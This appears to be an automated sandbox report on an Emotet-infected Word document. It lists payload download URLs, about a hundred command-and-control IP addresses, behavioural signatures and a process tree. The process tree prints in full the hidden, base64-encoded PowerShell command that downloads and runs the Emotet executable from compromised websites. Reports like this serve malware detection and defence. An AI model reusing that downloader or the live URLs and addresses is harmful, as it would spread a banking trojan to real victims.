Analysis
-
max time kernel
142s -
resource
win10v191014 -
submitted
11-12-2019 05:53
Task
task1
Sample
Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc
Resource
win7v191014
General
Malware Config
Extracted
http://www.prorites.com/wp-content/dsdb28de-kw0ch1msvi-003/
https://www.silvesterinmailand.com/wp-content/uploads/ibvgux-yg4-03475/
http://homemyland.net/tmp/wUHdeBS/
https://www.celbra.com.br/old/wp-content/uploads/2019/mbwl6-lwu0psmcb-523/
http://prihlaska.sagitta.cz/wp-content/uploads/WwcQXtRta/
Extracted
emotet
200.41.121.69:443
153.190.41.185:80
165.100.148.200:443
103.9.145.19:8080
46.105.128.215:8080
172.105.213.30:80
69.30.205.162:7080
172.104.70.207:8080
198.57.217.170:8080
103.122.75.218:80
212.112.113.235:80
113.52.135.33:7080
60.53.3.153:8080
1.32.54.12:8080
142.93.87.198:8080
91.117.31.181:80
45.129.121.222:443
186.215.101.106:80
143.95.101.72:8080
187.233.220.93:443
128.92.54.20:80
181.197.108.171:443
78.186.102.195:80
193.33.38.208:443
51.38.134.203:8080
24.27.122.202:80
181.47.235.26:993
210.111.160.220:80
162.144.46.90:8080
176.58.93.123:80
46.17.6.116:8080
174.57.150.13:8080
178.134.1.238:80
95.216.212.157:8080
37.59.24.25:8080
172.90.70.168:443
5.189.148.98:8080
177.103.201.23:80
115.179.91.58:80
200.71.112.158:53
190.161.67.63:80
23.253.207.142:8080
85.109.190.235:443
89.215.225.15:80
67.171.182.231:80
195.191.107.67:80
188.230.134.205:80
58.93.151.148:80
138.197.140.163:8080
122.11.164.183:80
192.161.190.171:8080
192.241.220.183:8080
190.5.162.204:80
119.159.150.176:443
83.99.211.160:80
210.224.65.117:80
211.218.105.101:80
50.116.78.109:8080
163.172.97.112:8080
98.15.140.226:80
216.75.37.196:8080
181.44.166.242:80
67.254.196.78:443
81.82.247.216:80
192.210.217.94:8080
190.171.135.235:80
110.142.161.90:80
83.110.107.243:443
86.6.123.109:80
72.69.99.47:80
83.156.88.159:80
189.61.200.9:443
95.216.207.86:7080
82.79.244.92:80
124.150.175.129:8080
182.176.116.139:995
46.105.131.68:8080
85.105.183.228:443
77.245.12.212:80
190.189.79.73:80
201.183.251.100:80
123.142.37.165:80
187.250.92.82:80
221.154.59.110:80
78.46.87.133:8080
195.250.143.182:80
152.169.32.143:8080
201.196.15.79:990
41.77.74.214:443
24.28.178.71:80
190.101.87.170:80
72.27.212.209:8080
191.100.24.201:50000
192.163.221.191:8080
212.129.14.27:8080
124.150.175.133:80
41.218.118.66:80
189.225.211.171:443
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4984 WINWORD.EXE -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
216.exedefprint.exepid process 4420 216.exe 4152 defprint.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE216.exe216.exedefprint.exedefprint.exepid process 4984 WINWORD.EXE 4764 216.exe 4420 216.exe 4104 defprint.exe 4152 defprint.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
SppExtComObj.exePowershell.exe216.exedefprint.exedescription pid process target process PID 4060 wrote to memory of 4476 4060 SppExtComObj.exe SLUI.exe PID 4708 wrote to memory of 4764 4708 Powershell.exe 216.exe PID 4764 wrote to memory of 4420 4764 216.exe 216.exe PID 4104 wrote to memory of 4152 4104 defprint.exe defprint.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4984 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4708 Powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Drops file in System32 directory 6 IoCs
Processes:
216.exedefprint.exedescription ioc process File renamed C:\Users\Admin\216.exe => C:\Windows\SysWOW64\defprint.exe 216.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat defprint.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 defprint.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE defprint.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies defprint.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 defprint.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Powershell.exedefprint.exepid process 4708 Powershell.exe 4152 defprint.exe -
Executes dropped EXE 4 IoCs
Processes:
216.exe216.exedefprint.exedefprint.exepid process 4764 216.exe 4420 216.exe 4104 defprint.exe 4152 defprint.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe -
Processes:
description ioc Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABCAHgAdQBoAGkAaABuAHIAdwBrAHoAbgBiAD0AJwBRAHIAYQBnAGkAcAB4AHcAZwAnADsAJABBAG4AdwBtAGkAdwBiAHUAegBoAHAAIAA9ACAAJwAyADEANgAnADsAJABUAHoAbgBsAG8AaQB5AGoAZgA9ACcASABzAHcAeQBkAGQAdwB5AGcAaQBzAGQAaAAnADsAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBuAHcAbQBpAHcAYgB1AHoAaABwACsAJwAuAGUAeABlACcAOwAkAEEAZwBkAGIAbgBjAHAAYQB0AHMAPQAnAEwAZQBkAGUAYwBsAHYAcwBvAGwAcgB0AHQAJwA7ACQAVwBuAGsAdgB4AHcAYgBhAD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBCAEMATABpAEUAbgBUADsAJABXAHoAagBsAGkAbABqAGMAZQA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHAAcgBvAHIAaQB0AGUAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGQAcwBkAGIAMgA4AGQAZQAtAGsAdwAwAGMAaAAxAG0AcwB2AGkALQAwADAAMwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwBpAGwAdgBlAHMAdABlAHIAaQBuAG0AYQBpAGwAYQBuAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AaQBiAHYAZwB1AHgALQB5AGcANAAtADAAMwA0ADcANQAvACoAaAB0AHQAcAA6AC8ALwBoAG8AbQBlAG0AeQBsAGEAbgBkAC4AbgBlAHQALwB0AG0AcAAvAHcAVQBIAGQAZQBCAFMALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGMAZQBsAGIAcgBhAC4AYwBvAG0ALgBiAHIALwBvAGwAZAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AMgAwADEAOQAvAG0AYgB3AGwANgAtAGwAdwB1ADAAcABzAG0AYwBiAC0ANQAyADMALwAqAGgAdAB0AHAAOgAvAC8AcAByAGkAaABsAGEAcwBrAGEALgBzAGEAZwBpAHQAdABhAC4AYwB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBXAHcAYwBRAFgAdABSAHQAYQAvACcALgAiAHMAcABgAGwAaQB0ACIAKAAnACoAJwApADsAJABNAHkAYgB3AGYAZQBmAGgAcgA9ACcAUgB0AHMAcwBkAGcAdQBlAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoAbABxAHYAcQBnAHMAZgB4AGoAYwByAGEAIABpAG4AIAAkAFcAegBqAGwAaQBsAGoAYwBlACkAewB0AHIAeQB7ACQAVwBuAGsAdgB4AHcAYgBhAC4AIgBEAG8AYABXAG4ATABgAE8AQQBkAEYAaQBsAEUAIgAoACQAWgBsAHEAdgBxAGcAcwBmAHgAagBjAHIAYQAsACAAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegApADsAJABEAHAAcgBtAG4AdQBvAHAAPQAnAEUAdgBjAGIAcwB2AGQAdABnACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQAuACIAbABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADcANgA2ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAHQAIgAoACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQA7ACQAWQB1AGIAYQB2AGkAbAB6AHAAeQBuAGsAdgA9ACcAVABxAGsAdABiAHcAeABtAHkAJwA7AGIAcgBlAGEAawA7ACQATABrAHIAawBlAHcAcQBlAHIAeABrAD0AJwBHAGUAawBzAGcAaQBzAGYAZwByAGoAZAB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAYgBoAGQAbABmAHcAYgBoAGUAPQAnAFUAcgB0AGgAaQBkAGwAbQB4AG0AZQAnAA==1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\216.exe"C:\Users\Admin\216.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Admin\216.exe--7272c7d53⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Executes dropped EXE
-
C:\Windows\SysWOW64\defprint.exe"C:\Windows\SysWOW64\defprint.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Windows\SysWOW64\defprint.exe--c67f8d9a2⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\216.exe
-
C:\Users\Admin\216.exe
-
C:\Users\Admin\216.exe
-
C:\Windows\SysWOW64\defprint.exe
-
C:\Windows\SysWOW64\defprint.exe
-
memory/4104-23-0x0000000000560000-0x0000000000577000-memory.dmpFilesize
92KB
-
memory/4152-25-0x0000000000730000-0x0000000000747000-memory.dmpFilesize
92KB
-
memory/4152-26-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/4420-11-0x00000000021A0000-0x00000000021B7000-memory.dmpFilesize
92KB
-
memory/4420-12-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/4764-9-0x0000000002180000-0x0000000002197000-memory.dmpFilesize
92KB
-
memory/4984-0-0x000001D9E9970000-0x000001D9E9971000-memory.dmpFilesize
4KB
-
memory/4984-1-0x000001D9E4F41000-0x000001D9E4F46000-memory.dmpFilesize
20KB